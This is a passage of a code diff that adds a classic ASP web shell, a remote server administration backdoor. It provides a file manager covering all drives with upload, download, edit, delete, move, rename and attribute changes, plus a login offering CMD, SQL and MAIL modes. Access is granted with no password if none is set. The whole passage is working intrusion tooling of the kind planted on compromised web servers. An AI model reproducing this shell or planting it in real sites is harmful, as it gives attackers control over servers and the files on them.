+</td></tr>
+</table>
+</center>
+<script>frmFile.content.focus()</script>
+<input type=hidden name=command value=Edit>
+<input type=hidden name=subcommand value="">
+<input type=hidden name=param value="<%=name%>">
+<input type=hidden name=folder value="<%=Request.Form("folder")%>">
+</form>
+<%
+set f=nothing
+HtmlJsEditor()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub ChangeAttributesItem()
+dim item,itemType,itemName,itemPath,itemAttrib
+
+itemType=Request.Form("command")
+itemName=Request.Form("param")
+itemPath=addslash(targetPath) & itemName
+
+HtmlHeader("")
+
+select case itemType
+case "ChangeAttributesFile" set item=FSO.GetFile(itemPath)
+case "ChangeAttributesFolder" set item=FSO.GetFolder(itemPath)
+end select
+
+if Request.Form("subcommand")="change" then
+itemAttrib=int(Request.Form("r"))
+itemAttrib=itemAttrib+int(Request.Form("h"))
+itemAttrib=itemAttrib+int(Request.Form("a"))
+itemAttrib=itemAttrib+int(Request.Form("s"))
+on error resume next
+item.Attributes=int(itemAttrib)
+if Err.Number<>0 then Response.Write "<script>alert('Permission denined')</script>" & vbNewLine
+end if
+
+itemAttrib=item.Attributes
+%>
+<b>C</b>hange attributes - "<%=itemName%>"
+<p align=center>
+<form name=frmAttrib method=post action="<%=gURL%>">
+<input type=hidden name=command value="<%=itemType%>">
+<input type=hidden name=subcommand value=change>
+<input type=hidden name=folder value="<%=targetPath%>">
+<input type=hidden name=param value="<%=itemName%>">
+<table>
+<tr>
+<td><input type=checkbox name=r value=1 <%if (itemAttrib and 1)>0 then Response.Write " checked"%>>Read-only</td>
+<td><input type=checkbox name=h value=2 <%if (itemAttrib and 2)>0 then Response.Write " checked"%>>Hidden</td>
+</tr>
+<tr>
+<td><input type=checkbox name=a value=32 <%if (itemAttrib and 32)>0 then Response.Write " checked"%>>Archive</td>
+<td><input type=checkbox name=s value=4 <%if (itemAttrib and 4)>0 then Response.Write " checked"%>>System</td>
+</tr>
+</table><br>
+<input type=button value=OK onclick="frmAttrib.submit()"> <input type=button value=Close onclick="window.close()">
+</form>
+</p>
+<%
+set itemType=nothing
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub OpenFolder()
+if Trim(Request.Form("folder"))="" then 
+if Trim(Request.Form("param"))="" then targetPath=root else targetPath=abspath(Trim(Request.Form("param")))
+else
+targetPath=addslash(Trim(Request.Form("folder"))) & Trim(Request.Form("param"))
+end if
+end sub
+
+'###########################################################################################
+
+sub CreateItem()
+dim itemType,itemName,itemPath 
+itemType=request.form("command")
+itemName=request.form("param")
+itemPath=addslash(targetPath) & itemName
+
+on error resume next
+
+select case itemType
+case "NewFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateFolder(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+else
+gMsg="Created the folder """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+case "NewFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateTextFile(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the file """ & itemName & """, an error occured..."
+else
+gMsg="Created the file """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+end select
+end sub
+
+'###########################################################################################
+
+sub ZipInfo()
+dim path,zip,zipfile,i
+
+path=addslash(targetPath) & Request.Form("param")
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<p><%=path%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Ratio</font></td>
+<td align=center><font color=#FFFF00>Packed</font></td>
+<td align=center><font color=#FFFF00>Modify</font></td>
+<td align=center><font color=#FFFF00>Path</font></td>
+</tr>
+<%
+set zip=new clszip
+zip.ZipLoad(path)
+set zipfile=new clsZipFile
+
+for i=1 to zip.FileCount
+set zipfile=zip.GetFile(i)
+with zipfile
+if not (.IsFolder Or .IsOverall) then
+Response.Write "<tr bgcolor=#000000>" & vbNewLine
+Response.Write " <td>" & .Name & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Size,0) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & .Ratio & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Packed,0) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(.Modified) & "</td>" & vbNewLine
+Response.Write " <td>" & .Path & "</td>" & vbNewLine
+end if
+end with
+next
+
+set ZipFile=nothing
+set zip=nothing
+%>
+</table>
+</p>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Delete()
+dim i,ndir,nfile,itemName,itemPath
+
+on error resume next
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>D</b>elete folder(s)..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFolder itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>D</b>elete file(s)..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFile itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Copy()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+cp_dst=Trim(Request.Form("cp"))
+if cp_dst="" then exit sub
+cp_dst=abspath(cp_dst)
+Session("cp_dst")=cp_dst
+
+if FSO.FolderExists(cp_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>C</b>opying folder(s) to """ & cp_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFolder itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>C</b>opying file(s) to """ & cp_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFile itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Move()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+mv_dst=Trim(Request.Form("mv"))
+if mv_dst="" then exit sub
+mv_dst=abspath(mv_dst)
+Session("mv_dst")=mv_dst
+
+if FSO.FolderExists(mv_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>M</b>oving folder(s) to """ & mv_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFolder itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+set item=nothing
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>M</b>oving file(s) to """ & mv_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+FSO.MoveFile itemPath,addslash(mv_dst)
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
+next
+end if
+end sub
+
+'###########################################################################################
+
+sub RenameItem()
+dim item,itemType,itemName,itemPath
+dim param,newName
+
+itemType=request.form("command")
+param=split(request.form("param"),"|")
+itemName=param(0)
+newName=param(1)
+itemPath=addslash(targetPath) & newName
+
+on error resume next
+
+select case itemType
+case "RenameFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFolder(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the folder """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the folder """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the folder """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+case "RenameFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFile(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the file """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the file """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the file """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+end select
+
+set item=nothing
+end sub
+
+'###########################################################################################
+
+sub List()
+dim objFolder,folder,item,intCount,bOpen,ext,count
+if not FSO.FolderExists(targetPath) then
+gMsg="Folder not found"
+else
+on error resume next
+set objFolder=FSO.GetFolder(targetPath)
+if Err.Number<>0 then
+gMsg="Can't open folder"
+else
+intCount=objFolder.SubFolders.Count+objFolder.Files.Count
+if Err.Number<>0 then
+gMsg="Permission denied"
+else
+%>
+<input type=button value=Refresh onclick="Command('Refresh')">
+<input type=button value="New File" onclick="Command('NewFile')">
+<input type=button value="New Folder" onclick="Command('NewFolder')">
+<input type=button value=Upload onclick="frmUpload.max.focus()">
+<input type=button value=Tree onclick="Command('Tree')">
+<%
+bOpen=true
+end if
+end if
+end if
+HtmlQuick()
+if gMsg<>"" then Response.Write "<p>" & gMsg & vbNewLine
+if bOpen then
+count=0
+if intCount>0 then Response.Write "<p>" & objFolder.SubFolders.Count & " subfolder(s)<br>" & vbNewLine & objFolder.Files.Count & " file(s)<br>" & vbNewLine
+if bSize then Response.Write "(" & FormatSize(objFolder.Size) & ")<br>" & vbNewLine
+%>
+<p>
+<table border=1 width=100%>
+<tr>
+<td><b>N</b>ame</td>
+<td align=center><b>S</b>ize</td>
+<td align=center><b>T</b>ype</td>
+<td align=center><b>M</b>odified</td>
+<td><b>A</b>ttributes</td>
+<td><b>A</b>ctions</td>
+<tr>
+<%
+if not isroot(targetPath) then
+%>
+<tr>
+<td><a href="javascript:Command('LevelRoot')" title="Up Root Level">\</a></td>
+<td> </td>
+<td align=center>Root</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<tr>
+<td><a href="javascript:Command('LevelUp')" title="Up One level">..</a></td>
+<td> </td>
+<td align=center>Up</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<%
+end if
+if intCount>0 then
+HtmlJsForm()
+%>
+<form name=theForm method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+<%
+for each item in objFolder.SubFolders
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('OpenFolder',"" & item.Name & "")""" 
+if Len(item.Name)>gMax then Response.Write " title=""" & item.Name & """"
+Response.Write ">" & FormatName(item.Name) & "</a></td>" & vbNewLine
+Response.Write " <td align=right> </td>" & vbNewLine
+Response.Write " <td align=center>DIR</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=d value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFolder',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFolder',"" & item.Name & "")""></td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+for each item in objFolder.Files
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('Download',"" & item.Name & "")"""
+ext=FSO.GetExtensionName(addslash(targetPath) & item.Name)
+re.IgnoreCase = true
+re.Pattern = "^" & ext & ",|," & ext & ",|," & ext & "$"
+if re.Test(lnkExt) then
+Response.Write " title=""-> " & Server.Htmlencode(FindLink(addslash(targetPath) & item.Name)) & """"
+elseif Len(item.Name)>gMax then
+Response.Write " title=""" & item.Name & """"
+end if
+
+Response.Write ">" & FormatName(item.Name) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatSize(item.Size) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & item.Type & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=f value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFile',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFile',"" & item.Name & "")"">"
+
+if re.Test(editExt) then
+Response.Write "<input type=button value=Edit onclick=""Command('Edit',"" & item.Name & "")"">"
+end if
+
+if Lcase(ext)="zip" then
+Response.Write "<input type=button value=Info onclick=""Command('ZipInfo',"" & item.Name & "")"">"
+end if
+
+Response.Write "</td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+if count>0 then
+%>
+<tr>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td><input type=checkbox name=allbox title="Select All" onclick="CheckAll()"><input type=button value=Delete title="Delete Selected Item(s)" onclick="DoWork('Delete')"></td>
+</tr>
+<%
+end if
+%>
+</table>
+<%
+if count>1 then
+%>
+<p>
+<table>
+<tr><td><b>C</b>opy selected item(s) to</td><td><input type=text name=cp value="<%=Session("cp_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.cp_bt.click();"> <input type=button id=cp_bt value=Copy onclick="DoWork('Copy')"></td></tr>
+<tr><td><b>M</b>ove selected item(s) to</td><td><input type=text name=mv value="<%=Session("mv_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.mv_bt.click();"> <input type="button" id=mv_bt value=Move onclick="DoWork('Move')"></td></tr>
+</table>
+<%
+end if
+%>
+</form>
+</table>
+<%
+end if
+set objFolder=nothing
+%>
+<p><b>U</b>pload file(s) to "<%=targetPath%>"
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=gURL%>">
+<input type=hidden name=folder value="<%=targetPath%>">
+Max: <input type=text name=max value=5 size=5> <input type=button value=# onclick="setid()"><br>
+<table>
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload>
+</form>
+<script>
+setid();
+function setid() {
+str='<br>';
+if (frmUpload.max.value<=0) frmUpload.max.value=1;
+for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end if
+%>
+<form name=frmFile method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=param value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+</form>
+<script>frmAddress.param.focus()</script>
+<%
+HtmlJsCommand()
+end sub
+
+'###########################################################################################
+
+sub Upload()
+dim objUpload,f,max,i,name,path,size,success
+
+HtmlHeader("")
+HtmlMode()
+
+set objUpload=New clsUpload
+
+targetPath=objUpload.Fields("folder").Value
+max=objUpload.Fields("max").Value
+
+gMsg= "<b>U</b>pload..." & vbNewLine
+
+for i=1 to max
+name=objUpload.Fields("file" & i).FileName
+size=objUpload.Fields("file" & i).Length
+if (name<>"") and (size>0) then
+gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+path=addslash(targetPath) & name
+objUpload.Fields("file" & i).SaveAs path
+if FSO.FileExists(path) then
+on error resume next
+set f=FSO.GetFile(path)
+if IsObject(f) then
+if f.Size=size then success=true else success=false
+end if
+set f=nothing
+end if
+if success then gMsg=gMsg & "success" else gMsg = gMsg & "fail"
+end if
+next
+
+set objUpload=nothing
+
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Download()
+dim oStream
+dim szFileName
+szFileName=addslash(Request.Form("folder")) & Request.form("Param")
+if FSO.FileExists(szFileName) then
+set oStream=Server.CreateObject("ADODB.Stream")
+oStream.Type=1
+oStream.Open
+on error resume next
+oStream.LoadFromFile(szFileName)
+if Err.Number=0 then
+Response.AddHeader "Content-Disposition", "attachment; filename=" & FSO.GetFileName(szFileName)
+Response.AddHeader "Content-Length", oStream.Size
+Response.ContentType="bad/type" 'yeu cau ie hien hop thoai save-as
+Response.BinaryWrite oStream.Read
+end if
+oStream.Close
+set oStream=nothing
+end if
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Logout()
+Session.Abandon
+Response.Redirect gURL
+Destroy()
+end sub
+
+sub Init()
+Session("switch")=false
+set FSO=Server.CreateObject("Scripting.FileSystemObject")
+set re=new regexp
+end sub
+
+sub Destroy()
+set FSO=nothing
+set re=nothing
+Response.End
+end sub
+
+'###########################################################################################
+
+sub Secure()
+if (Session("allow")=1) then exit sub
+if (gPassword="") then
+Session("allow")=1
+Session("mode")=0
+exit sub
+end if
+if (Request.Form("command")="Login") then
+if Request.Form("password")=gPassword then
+Session("allow")=1
+Session("mode")=CInt(Request.Form("mode"))
+exit sub
+end if
+end if
+
+HtmlHeader("")
+%>
+<form name=frmLogin method=post action="<%=gURL%>">
+<table>
+<tr>
+<td><b>M</b>ode:</td>
+<td>
+<select name=mode>
+<option value=0 selected>FILE
+<option value=1>CMD
+<option value=2>SQL
+<option value=3>MAIL
+</select>
+</td>
+</tr>
+<tr>
+<td><b>P</b>assword:</td>
+<td><input type=password name=password></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=command value=Login></td>
+</tr>
+</table>
+</form>
+<script>frmLogin.password.focus()</script>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub HtmlJsForm()
+%>
+<script>
+function CheckAll() {
+var fmobj=document.theForm;
+for (var i=0; i<fmobj.elements.length;i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (!e.disabled)) {
+e.checked=fmobj.allbox.checked;
+}
+}
+if (fmobj.allbox.checked) {
+fmobj.allbox.title='Clear All';
+} else {
+fmobj.allbox.title='Select All';
+}
+}
+
+function DoWork(cmd) {
+var s;
+var fmobj=document.theForm;
+var total=0;
+for (var i=0; i<fmobj.elements.length; i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (e.checked)) total++;
+}
+
+if (total<1) return;
+
+s=(total>1)?'s':'';
+
+switch (cmd) {
+case "Delete":
+if (!confirm('Are you sure to delete ' + total + ' selected item' + s + ' ?')) return;
+break;
+case "Move":
+var mv=fmobj.mv.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (mv=='') return;
+if ( re1.test(mv) || re2.test(mv) ){
+if (!confirm('Are you sure to move ' + total + ' selected item' + s + ' to "' + mv + '" ?')) return;
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "Copy":
+var cp=fmobj.cp.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (cp=='') return;
+if ( re1.test(cp) || re2.test(cp) ) {
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+default:
+return;
+}
+
+fmobj.command.value=cmd;
+fmobj.submit();
+}
+</script>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlJsCommand()
+%>
+<script>
+function openWin(winName, urlLoc, w, h, showStatus, isViewer) {
+l = (screen.availWidth - w)/2;
+t = (screen.availHeight - h)/2;
+features = "toolbar=no"; // yes|no 
+features += ",location=no"; // yes|no 
+features += ",directories=no"; // yes|no 
+features += ",status=" + (showStatus?"yes":"no"); // yes|no 
+features += ",menubar=no"; // yes|no 
+features += ",scrollbars=" + (isViewer?"yes":"no"); // auto|yes|no 
+features += ",resizable=" + (isViewer?"yes":"no"); // yes|no 
+features += ",dependent"; // close the parent, close the popup, omit if you want otherwise 
+features += ",height=" + h;
+features += ",width=" + w;
+features += ",left=" + l;
+features += ",top=" + t;
+winName = winName.replace(/[^a-z]/gi,"_");
+return window.open(urlLoc,winName,features);
+} 
+
+function createPage (theWin, cmd, param){
+frmFile.target = theWin.name;
+frmFile.command.value = cmd;
+frmFile.param.value = param;
+frmFile.submit();
+}
+
+function CheckName(str) {
+var re;
+re = /[\\/:*?"<>|]/gi;
+if (re.test(str)) return false; 
+else return true;
+} 
+
+function Command(cmd, param) {
+var str;
+var someWin;
+switch (cmd) {
+case "Tree":
+str = prompt("Please enter a name for the folder to tree", frmFile.folder.value);
+if (!str) return;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (re1.test(str) || re2.test(str)) {
+var winName=cmd + document.forms.frmFile.param.value;
+param=str;
+document.forms.frmFile.param.value=param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+}
+else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "NewFile":
+str = prompt("Please enter a name for the new file", "New File");
+if(!str) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "NewFolder":
+str = prompt("Please enter a name for the new folder", "New Folder");
+if(!str) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "RenameFile":
+str = prompt("Please enter the new name for the file", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "RenameFolder":
+str = prompt("Please enter the new name for the folder", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "Edit":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 600, 440, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ChangeAttributesFile":
+case "ChangeAttributesFolder":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 300, 160, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ZipInfo":
+var winName=cmd + document.forms.frmFile.folder.value + param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break
+default:
+frmFile.param.value = param;
+}
+frmFile.target = "";
+frmFile.command.value = cmd
+frmFile.submit(); 
+}
+</script>
+<%
+end sub
+
+sub HtmlJsEditor()
+%>
+<script>
+function EditorCommand (cmd) {
+switch (cmd) {
+case "WordWrap":
+if (frmFile.wrap.checked) frmFile.content.wrap="soft";
+else frmFile.content.wrap="off";
+frmFile.content.focus();
+break;
+case "Reload":
+frmFile.reset();
+break;
+case "Save":
+frmFile.subcommand.value = "Save";
+frmFile.submit();
+break;
+case "SaveAs":
+var str, oldname;
+oldname = frmFile.param.value;
+str = prompt("Save the file as :", oldname);
+if (!str || str==oldname) return;
+frmFile.param.value = str;
+frmFile.subcommand.value = "SaveAs";
+frmFile.submit();
+break;
+}
+}
+</script>
+<%
+end sub
+
+sub HtmlQuick()
+%>
+<form name=frmQuick method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<select name=param onchange="frmQuick.submit()">
+<%
+dim dc,d,dName,dType
+set dc=FSO.Drives
+for each d in dc
+dName=d.DriveLetter&":\"
+select case d.DriveType
+case 0 dType="Unknown"
+case 1 if d.driveletter="A" then dType="?" else dType="?"
+dType=dType&" Floppy" 'maybe wrong
+case 2 dType="HDD " & FormatSize(d.TotalSize)
+case 3 dType="Network"
+case 4
+dType="CD-ROM"
+if not d.IsReady then dType=dType & " - not ready"
+case 5
+dType="RAM Disk"
+end select
+Response.Write "<option value=""" & dName & """"
+if d.DriveLetter=Ucase(Left(targetPath,1)) then Response.Write " selected"
+Response.Write ">" & dName& " (" & dType & ")" & vbNewLine
+next
+set dc=nothing
+%>
+</select>
+</form>
+<form name=frmAddress method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<b>A</b>ddress: <input type=text name=param value="<%=targetPath%>" size=90> <input type=submit value=Go>
+</form>
+<%
+end sub
+
+sub HtmlMode()
+%>
+<table>
+<tr>
+<td>
+<form name=frmChangeMode method=post action="<%=gURL%>">
+<input type=hidden name=command value=ChangeMode>
+<select name=mode onchange="frmChangeMode.submit()">
+<option value=0<%if Session("mode")=0 then Response.Write " selected"%>>FILE
+<option value=1<%if Session("mode")=1 then Response.Write " selected"%>>CMD
+<option value=2<%if Session("mode")=2 then Response.Write " selected"%>>SQL
+<option value=3<%if Session("mode")=3 then Response.Write " selected"%>>MAIL
+</select>
+</form>
+</td>
+<%
+if gPassword<>"" then
+%>
+<td>
+<form name=frmLogout method=post action="<%=gURL%>">
+<input type=submit name=command value=Logout>
+</form>
+</td>
+<%
+end if
+%>
+</tr>
+</table>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlHeader(strTitle)
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=strTitle%></title>
+<style>
+select,input{font-family:Verdana;font-size:9pt}
+</style>
+</head>
+<body>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlFooter()
+%>
+</body>
+</html>
+<%
+end sub
+
+'###########################################################################################
+
+function abspath(path)
+if left(path,1)=":" then abspath=Server.MapPath(mid(path,2)) else abspath=FSO.GetAbsolutePathName(path)
+end function
+
+'###########################################################################################
+
+function addslash(path)
+if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+'###########################################################################################
+
+function findroot(path)
+dim f
+
+set f=FSO.GetFolder(path)
+
+if f.IsRootFolder then
+else
+do until f.IsRootFolder
+set f=f.ParentFolder
+loop
+end if
+findroot=f.Path
+set f=nothing
+end function
+
+'###########################################################################################
+
+function isroot(path)
+dim f
+set f=FSO.GetFolder(path)
+isroot=f.IsRootFolder
+set f=nothing
+end function
+
+'###########################################################################################
+
+Function FindLink(szFileName)
+Dim WshShell, oLink
+
+Set WshShell=Server.CreateObject("WScript.Shell")
+Set oLink=WshShell.CreateShortcut(szFileName)
+
+FindLink=oLink.TargetPath
+
+Set oLink=Nothing
+Set WshShell=Nothing
+End Function
+
+'###########################################################################################
+
+Function FormatSize(intSize)
+If (intSize < 1024) Then
+FormatSize = intSize & " B"
+ElseIf (intSize < 1024*1024) Then
+FormatSize = FormatNumber(intSize/1024,2) & " KB"
+ElseIf (intSize < 1024*1024*1024) Then
+FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+Else
+FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+End If
+End Function
+
+'###########################################################################################
+
+Function FormatName(szName)
+FormatName = szName
+If gMax > 5 And Len(szName) > gMax Then FormatName = Left(szName,gMax-2) & "..."
+End Function
+
+'###########################################################################################
+
+function FormatDate(strDate)
+dim int12HourPart,strAMPM
+int12HourPart=DatePart("h",strDate) mod 12
+if int12HourPart=0 then int12HourPart=12
+if DatePart("h",strDate)>=12 then strAMPM="PM" else strAMPM="AM"
+FormatDate=Right("0"&DatePart("d",strDate),2) & "/" & Right("0"&DatePart("m",strDate),2) & "/" & DatePart("yyyy",strDate) & " " & Right("0"&int12HourPart,2) & ":" & Right("0"&DatePart("n",strDate),2) & ":" & Right("0"&DatePart("s",strDate),2) & " " & strAMPM
+end function
+
+'###########################################################################################
+
+Function GetAttributes(intAttr)
+Dim strAttributes
+strAttributes=""
+If (intAttr And 1) > 0 Then strAttributes = "R"
+If (intAttr And 2) > 0 Then strAttributes=strAttributes & "H"
+If (intAttr And 4) > 0 Then strAttributes=strAttributes & "S"
+If (intAttr And 32) > 0 Then strAttributes=strAttributes & "A"
+If (intAttr And 2048) > 0 Then strAttributes=strAttributes & "C"
+if strAttributes="" then strAttributes=" "
+GetAttributes=strAttributes
+End Function
+
+'###########################################################################################
+
